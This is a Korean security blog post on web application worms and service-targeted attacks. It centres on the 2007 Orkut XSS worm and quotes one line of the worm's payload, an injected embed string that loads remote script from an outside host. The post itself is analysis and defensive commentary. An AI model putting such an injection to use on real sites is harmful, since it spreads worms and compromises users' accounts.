본문 바로가기

Security Indicator

Service Attack (ex:Google의 orkut)의 세계화

바다란입니다.

 

지난해 초에 Web 2.0의 위협요소와 관련하여 여러 곳에서 발표를 한 내용이 있습니다. 그 PPT의 마지막장에 앞으로 다가올 위험요소들은 무엇이 있을까?에 대한 예상을 게재한 바 있습니다.

그 예상은 다음과 같습니다.

 

 

2007년 2월에 작성한 예상은 지금도 유효하며 향후에도 3~5년 가까이 유효한 예상입니다. 2006년 하반기에도 비슷한 이슈들이 있었으나 분석가들 대부분은 개별 기업의 문제로 치부하고 단편적인 이슈로 취급을 하였습니다. 세계적인 경우에도 비슷합니다. 국내의 경우에는 당연히 기사를 받아다 쓰는 경우 외에는 없었죠.

 

이 예상의 근거는 무엇인가 하면 취약성의 발견과 공격 기법의 변화, 파급효과에 따른 기대치에 따라서 예상이 되었습니다. 보다 많은 대상자에게 공격을 하는 패러다임의 전환기에서 일반 사용자 PC를 공격하기 위한 다양한 Bot 들이 출현 하였다면 이제는 보다 더 대상을 명확하게 규정하고 확실한 효과를 보기 위해서 Web Application worm을 이용한다는 변화가 심각하게 눈에 들어 왔기 때문입니다.

 

앞으로의 예상도 유사합니다.

보다 많은 대상자에게.. 보다 많은 유효한 대상에게 전파를 하고 확실한 효과를 얻기 위한 공격 기법은 계속 될 것이고 이 공격은 Cyber Black market이 존재하는한 ( 향후 몇 십년간 근절될 가능성은 없습니다. 인간의 기본적인 속성상..) 계속 될 수 밖에 없습니다.

 

Web을 통한 악성코드의 유포의 경우에도 일반적으로 국내와 최근의 해외의 경우에는 특정 게임의 계정을 탈취하기 위한 공격들이 많았습니다. 특정 게임의 유저들이 자주 방문하는 사이트를 공격하는 경우가 일반적이였으며 이제는 전체의 대상자를 겨냥한 사이트 공격이 일반화 되어 있습니다. 

 

악성코드의 두 가지 흐름은 Application Attack 관점에서 두 가지 방향으로 볼 수 있습니다. 하나는 위에 언급한 악성코드 유포를 위한 관련성 있는 Web site에 대한 직접적인 공격 ( Application의 Perimeter validation error 부분을 공격 - ex : sql injection, Cross Site Scripting)을 통한 방문자 PC 악성코드 전파 사례와 또 다른 하나는 직접적인 Service 구조를 공격하는 Application Attack이 있을 수 있습니다.

 

첫번째 케이스는 이미 이 블로그에서도 상당부분 지적한 바 있으며 Service에 특화된 공격들도 예를 든 적이 있습니다. Yahoo Messenger에 대한 공격, Myspace에 대한 악성코드 Attack들이 있으며 지난해 12월에 발생된 Google의 orkut ( SNS) 사이트에 대한 공격이 특별한 예가 될 수 있습니다.

 

Orkut에 대한 공격은 하기의 링크를 참조 하시면 일정 수준의 정보를 얻을 수 있습니다.

 

http://www.news.com/8301-10784_3-9836029-7.html?tag=nefd.only

http://www.cgisecurity.com/2007/12/17

 

source code & analysis

 

http://www.marrowbones.com/commons/technosocial/2007/12/orkut_worm_code_and_why_was_go.html
http://ha.ckers.org/blog/20071220/orkut-xss-worm/

 

위와 같이 정보의 확인이 가능합니다. 위의 기사에서 언급 되었듯이 40만명 가까운 유저에게 짧은 시간동안에 Worm이 퍼지는 것을 확인 할 수 있습니다. 관계로 이루어 지는 모든 SNS 사이트들은 동일한 구조를 지닐 수 밖에 없으며 문제를 가지고 있습니다. 이제는 Web을 통한 연결이 일반화 되고 다양한 연결 도구들을 활용 하여 ( AJAX, RSS , ATOM ...) 연결이 이루어짐으로 인해 피해는 특정 서비스에 한정된 모든 사용자들에게 전파가 됩니다.

 

orkut worm에서의 중요 코드는 다음과 같습니다.

"[/silver]<br/><embed src=\"http://www.orkut.com/LoL.aspx\" type=\"application/x-shockwave-flash\" wmode=\"transparent'); script=document.createElement('script');script.src='http://files.myopera.com/virusdoorkut/files/virus.js';document.getElementsByTagName('head')[0].appendChild(script);escape('\"width=\"1\" height=\"1\"></embed>";

 

위의 코드에서 중요한 부분은 사이트 실행시에 전달되는 인자 값에 script가 실행되는 문제가 모든 문제의 시작이라 할 수 있습니다. 전달 되는 인자값에 스크립트가 실행됨으로 인해 스크립트 내의 소스코드들은 orkut의 Friend list를 가져오고 전파하는 유형의 코드들을 볼 수 가 있습니다.  ( 상세 내용은 위에 언급한 URL 내의 소스코드를 일부 분석해 보시면 연관관계 파악이 가능합니다.)

 

지난해 초에 제시한 Next Threat의 특징들에 제시된 내용과 동일함을 볼 수 있습니다.

 

Application Web service worm 이며 특정 서비스에만 국한된 국지적인 영향 ( Google의 orkut) , Ubiquitous Attack ( 유,무선 사용자들에게 동일한 영향을 미침), 더불어 플랫폼에도 국한되지 않는 공격입니다.

대안으로는 여러번 언급 하였으나 모든 Application에 대한 사용자 접근 지점에 대한 Validation check의 일반화 , 사고 발생 이후의 빠르고 역동적인 대응만이 해결책입니다. 이 부분을 처리 하기 위해서는 수준높은 전문가의 활용과 서비스에 익숙한 보안 전문가들의 확보가 필수적입니다. 세계적인 기업들에 Application security 전문가들의 자리는 앞으로도 많이 비어 있을 수 밖에 없습니다. 그만큼 기회도 많고 Risk도 높다는 이야기 입니다. 국내라고 예외 이겠습니까?...

 

많은 IT 서비스 기업들이 보다 더 사용자 접근성을 강화하고 활발하게 하도록 구성이 되고 있는 지금 시점에 해외보다 더 많은 위험들이 존재한다고 볼 수 있습니다. 단지 공격에 대한 기대 효과가 있느냐 하는 가치의 문제 때문에 시도가 되지 않는 것이죠. 일부 대규모 IT 서비스 업체에서는 알게 모르게 Service에 특화된 Attack들이 다수 있었을 것입니다. ( 부정 할 수 있는 서비스 업체가 어디 일까요? )

 

왜 이런 유형들이 발생되고 있고 향후에는 어떻게 될 것인지에 대해서 인지하는 것은 중요합니다. 그러나 그 어느 누구도 중요성을 언급하지 않습니다. 05년 부터 중국발 해킹의 위험성과 파괴력에 대해서 언급 하였으나 세계적인 흐름은 07년에 들어서야 가까스로 피해를 입고 인지하는 수준으로 전달이 되고 있습니다. 그만큼 국내의 환경은 빠르고도 역동적인 기회를 부여합니다. ( 보안전문가들에게..) 더불어 그만큼 가혹한 노력을 요구하는 환경입니다.

 

앞으로의 방향성에 대해서 고민하지 않는 전문가. 생각조차 하지 않는 전문가들은 가치가 없습니다.

치열하게 고민해야 됩니다.

 

 

특화된 Service Attack은 계속 발전할 것이고 사용자 연결 지점의 사소한 문제들도 이제는 전체의 서비스에 영향을 미치는 거대 사안이 될 수 있습니다. 그만큼 중요도가 높아 진다는 것이죠.

변화를 따라 갈 것이냐 리딩 할 것이냐는 마음먹기에 따라 달린 것입니다.

 

올해도 또 이렇게 시작합니다.  앞으로도 많은 관심과 질책을 아낌 없이 주셨으면 합니다. 지난 한해 감사했습니다.

 

- p4ssion is never fade away . 바다란